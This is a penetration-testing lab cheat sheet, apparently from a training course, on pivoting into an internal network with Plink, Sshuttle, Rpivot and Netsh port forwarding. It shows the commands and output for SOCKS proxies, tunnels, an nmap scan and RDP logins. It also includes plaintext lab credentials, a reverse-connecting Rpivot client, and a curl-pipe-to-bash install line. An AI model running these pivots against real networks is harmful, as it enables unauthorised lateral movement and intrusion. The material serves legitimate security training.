Plink, Sshuttle, Rpivot, and Netsh Unleashed

Plink Pivoting

Verify PuTTY Installation

Checks if Plink is installed on the Windows attack host to enable SSH-based pivoting.

C:\mrci0x1> dir "C:\Program Files\PuTTY\plink.exe"

Set Up Dynamic Port Forwarding with Plink

Creates a SOCKS proxy on port 9050 to route traffic through the Ubuntu server.

C:\mrci0x1> plink.exe -ssh -D 9050 ubuntu@10.129.15.50

Establish an RDP Session

Initiates an RDP session to the Windows target, routed through the Plink SOCKS proxy.

C:\mrci0x1> mstsc.exe /v:172.16.5.19

Sshuttle Pivoting

Install Sshuttle

Installs Sshuttle on the attack host to enable transparent network pivoting.

C:\mrci0x1> sudo apt-get install sshuttle

Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
The following packages were automatically installed and are no longer required:
  alsa-tools golang-1.15 golang-1.15-doc golang-1.15-go golang-1.15-src
  golang-1.16-src libcmis-0.5-5v5 libct4 libgvm20 liblibreoffice-java
  libmotif-common libqrcodegencpp1 libunoloader-java libxm4
  linux-headers-5.10.0-6parrot1-common python-babel-localedata
  python3-aiofiles python3-babel python3-fastapi python3-pydantic
  python3-slowapi python3-starlette python3-uvicorn sqsh ure-java
Use 'sudo apt autoremove' to remove them.
Suggested packages:
  autossh
The following NEW packages will be installed:
  sshuttle

Configure Sshuttle

Routes traffic for the 172.16.5.0/23 network through the Ubuntu server.

C:\mrci0x1> sudo sshuttle -r ubuntu@10.129.202.64 172.16.5.0/23 -v

Starting sshuttle proxy (version 1.1.0).
c : Starting firewall manager with command: ['/usr/bin/python3', '/usr/local/lib/python3.9/dist-packages/sshuttle/__main__.py', '-v', '--method', 'auto', '--firewall']
fw: Starting firewall with Python version 3.9.2
fw: ready method name nat.
c : IPv6 enabled: Using default IPv6 listen address ::1
c : Method: nat
c : IPv4: on
c : IPv6: on

Scan the Windows Target

Scans the Windows target for RDP service availability through the Sshuttle tunnel.

C:\mrci0x1> nmap -v -sV -p3389 172.16.5.19 -A -Pn

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-08 11:16 EST
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 11:16
Completed NSE at 11:16, 0.00s elapsed
Initiating NSE at 11:16
Completed NSE at 11:16, 0.00s elapsed
Initiating NSE at 11:16
Completed NSE at 11:16, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 11:16
Completed Parallel DNS resolution of 1 host. at 11:16, 0.15s elapsed
Initiating Connect Scan at 11:16
Scanning 172.16.5.19 [1 port]

Establish an RDP Session

Connects to the Windows target via RDP using the Sshuttle tunnel.

C:\mrci0x1> xfreerdp /v:172.16.5.19 /u:victor /p:pass@123

Rpivot Pivoting

Clone Rpivot

Downloads the Rpivot repository to the attack host for SOCKS proxy pivoting.

C:\mrci0x1> git clone https://github.com/klsecservices/rpivot.git

Install Python 2.7

Installs Python 2.7 to support Rpivot execution.

C:\mrci0x1> sudo apt-get install python2.7

Alternative method using pyenv to install Python 2.7.

C:\mrci0x1> curl https://pyenv.run | bash
C:\mrci0x1> echo 'export PYENV_ROOT="$HOME/.pyenv"' >> ~/.bashrc
C:\mrci0x1> echo 'command -v pyenv >/dev/null || export PATH="$PYENV_ROOT/bin:$PATH"' >> ~/.bashrc
C:\mrci0x1> echo 'eval "$(pyenv init -)"' >> ~/.bashrc
C:\mrci0x1> source ~/.bashrc
C:\mrci0x1> pyenv install 2.7
C:\mrci0x1> pyenv shell 2.7

Start the Rpivot Server

Runs the Rpivot server on the attack host to listen for client connections.

C:\mrci0x1> cd rpivot
C:\mrci0x1> python2.7 server.py --proxy-port 9050 --server-port 9999 --server-ip 0.0.0.0

Transfer Rpivot to the Pivot Host

Copies the Rpivot directory to the Ubuntu server.

C:\mrci0x1> scp -r rpivot ubuntu@10.129.202.64:/home/ubuntu/

Run the Rpivot Client

Starts the Rpivot client on the pivot host to connect back to the attack host.

C:\pivot_host> python2.7 client.py --server-ip 10.10.14.104 --server-port 9999

New connection from host 10.129.202.64, source port 35226

Configure Proxychains

Configures proxychains to route traffic through the Rpivot SOCKS proxy.

C:\mrci0x1> echo "socks4 127.0.0.1 9050" >> /etc/proxychains.conf

Access the Web Server

Uses proxychains with Firefox to access the internal web server.

C:\mrci0x1> proxychains firefox-esr 172.16.5.135:80
C:\mrci0x1> proxychains curl http://172.16.5.135:80

Handling NTLM Authentication

Runs the Rpivot client with NTLM credentials for authenticated proxies.

C:\pivot_host> python2.7 client.py --server-ip 10.10.14.104 --server-port 8080 --ntlm-proxy-ip <IPaddressofProxy> --ntlm-proxy-port 8081 --domain INLANEFREIGHT --username <username> --password <password>

Netsh Port Forwarding

Configure Port Forwarding with Netsh

Sets up a port forwarding rule on the compromised Windows host to redirect traffic from the external interface to the internal target.

C:\windows> netsh.exe interface portproxy add v4tov4 listenport=8080 listenaddress=10.129.15.150 connectport=3389 connectaddress=172.16.5.19

Verify the Port Forwarding Rule

Checks the configured portproxy settings to confirm the forwarding rule.

C:\windows> netsh.exe interface portproxy show v4tov4

Listen on ipv4:             Connect to ipv4:

Address         Port        Address         Port
--------------- ----------  --------------- ----------
10.129.15.150   8080        172.16.5.19     3389

Connect to the Internal Host

Initiates an RDP session from the attack host to the forwarded port on the compromised Windows host.

C:\mrci0x1> xfreerdp /v:10.129.15.150:8080 /u:victor /p:pass@123

PreviousSocat NextDnscat2, Chisel, Ptunnel-ng, and SocksOverRDP Tunneling Techniques

Last updated 1 month ago